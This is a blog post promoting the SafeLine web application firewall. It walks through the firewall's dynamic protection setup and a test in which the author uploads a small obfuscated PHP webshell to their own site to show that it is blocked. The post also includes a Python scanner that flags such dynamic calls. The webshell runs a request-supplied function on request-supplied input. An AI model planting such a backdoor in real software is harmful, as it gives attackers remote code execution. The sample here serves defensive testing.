DEV Community

Lulu

Real-World Attack Testing with SafeLine: A Guide to Dynamic Protection

1. Introduction to SafeLine

Since 2016, Chaitin Tech has been committed to making cybersecurity accessible to everyone. They initially open-sourced SafeLine's semantic analysis engine and have since released various plugins and communication protocols associated with SafeLine. In April 2023, Chaitin took it a step further by launching a free community edition of SafeLine on GitHub. This move allows more developers and companies to experience the power of SafeLine’s semantic analysis algorithms at zero cost, aiming to advance the development and application of intelligent semantic analysis in cybersecurity.

2. Experiencing Dynamic Protection

Introduction to Dynamic Protection
The Dynamic Protection feature is a significant update to SafeLine WAF, designed to offer more flexible and efficient security defenses. It provides comprehensive protection for web applications by monitoring in real time and dynamically adjusting protection strategies.

Adding Protected Sites

  • After logging in, navigate to "Web Services" and click "Add Web Service."

  • Enter the domain and port to be monitored, and in the upstream server field, input the internal address of your web server.

Configuring Dynamic Protection Resources

  1. Go to the "Dynamic" configuration page from "Web Services."

  2. Add the resources you want to protect by clicking "Select Resources" at the bottom right.

Before and After Protection

  • Before Protection: [screenshot]

  • After Protection: [screenshot]

Dynamic Protection Review

As shown above, once you select the resources to protect, SafeLine informs you that the site is now protected by WAF. The original code on the page is replaced with obfuscated code, enhancing security significantly.

3. Attack Testing (Disclaimer: This was tested on my own site.)

Step 1: Constructing the Attack Code

I created a backdoor script that passes variables multiple times. Normally, this code wouldn't trigger any alarms. I then uploaded it via the web to see if SafeLine would detect it:

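<?php
// Both values are read straight from the request body.
$username = $_POST['username'];
$password = $_POST['password'];
$shell = "username";   // the name of another variable, stored as a string
$variable = $password;
// $$shell resolves to $username, so the request-supplied string is invoked as a
// function with $variable as its argument; @ suppresses any error output.
@$$shell($variable);
?>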
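The script above never names the function it runs: the callee is reached through a variable variable, and both the callee and its argument are filled from `$_POST`. As an added example (not part of the original post, and not SafeLine's detection logic), this Python scanner flags calls whose callee is a variable and traces whether that variable is fed by request data; `find_dynamic_calls` and its result fields are names assumed for this example, and it uses regular expressions rather than a full PHP parser.

```python
import re

# Strings and comments in one alternation, so markers inside either are not misread.
_LEX = re.compile(r"""(?P<s>'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")"""
                  r"""|(?P<c>/\*.*?\*/|//[^\n]*|#[^\n]*)""", re.S)
_SUPER = {"_GET", "_POST", "_REQUEST", "_COOKIE"}
_SRC = re.compile(r"\$(\w+)\s*=(?!=)[^;]*?\$_(?:GET|POST|REQUEST|COOKIE)\b")
_COPY = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\s*;")
_LIT = re.compile(r"""\$(\w+)\s*=\s*(['"])([A-Za-z_]\w*)\2\s*;""")
_CALL = re.compile(r"(\$+)([A-Za-z_]\w*)(?:\[[^\]]*\])*\s*\(([^)]*)")

def _scrub(src, blank_strings):
    # Drop comments (and optionally string bodies) while keeping line numbers.
    # Heredoc/nowdoc bodies are not handled by this example.
    def repl(m):
        if m.group("s") and not blank_strings:
            return m.group(0)
        return ("''" if m.group("s") else " ") + "\n" * m.group(0).count("\n")
    return _LEX.sub(repl, src)

def find_dynamic_calls(php_source):
    code = _scrub(php_source, blank_strings=False)
    literals = {m.group(1): m.group(3) for m in _LIT.finditer(code)}
    tainted = _SUPER | {m.group(1) for m in _SRC.finditer(code)}
    copies = [m.groups() for m in _COPY.finditer(code)]
    for _ in copies:  # enough passes to carry taint through any chain of `$a = $b;`
        tainted |= {dst for dst, src in copies if src in tainted}
    bare = _scrub(code, blank_strings=True)  # call-like text inside strings is ignored
    findings = []
    for m in _CALL.finditer(bare):
        sigils, name, args = m.groups()
        # `$$name(...)` calls whatever variable $name's string value points at.
        callee = literals.get(name) if len(sigils) > 1 else name
        findings.append({
            "line": bare.count("\n", 0, m.start()) + 1,
            "callee_var": callee,
            "request_controlled": callee in tainted or (len(sigils) > 1 and name in tainted),
            "tainted_args": [a for a in re.findall(r"\$(\w+)", args) if a in tainted],
        })
    return findings

# The script from the post, reproduced as input for the scanner.
SAMPLE = """<?php
$username = $_POST['username'];
$password = $_POST['password'];
$shell = "username";
$variable = $password;
@$$shell($variable);
?>"""
```

On the script from the post, `find_dynamic_calls(SAMPLE)` reports a single call on line 6 whose callee variable and argument both trace back to `$_POST`.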

Step 2: Upload Test

It quickly became clear that my upload operation failed. A quick check revealed that SafeLine had intercepted the upload.


Step 3: Backend Check

In the SafeLine dashboard, I could see that my site was under attack. The protection was solid, clearly marking the attacker's IP, logging the attack details, and even providing AI analysis options.


4. Relevant Links

Official Website: https://waf.chaitin.com

GitHub: https://github.com/chaitin/SafeLine
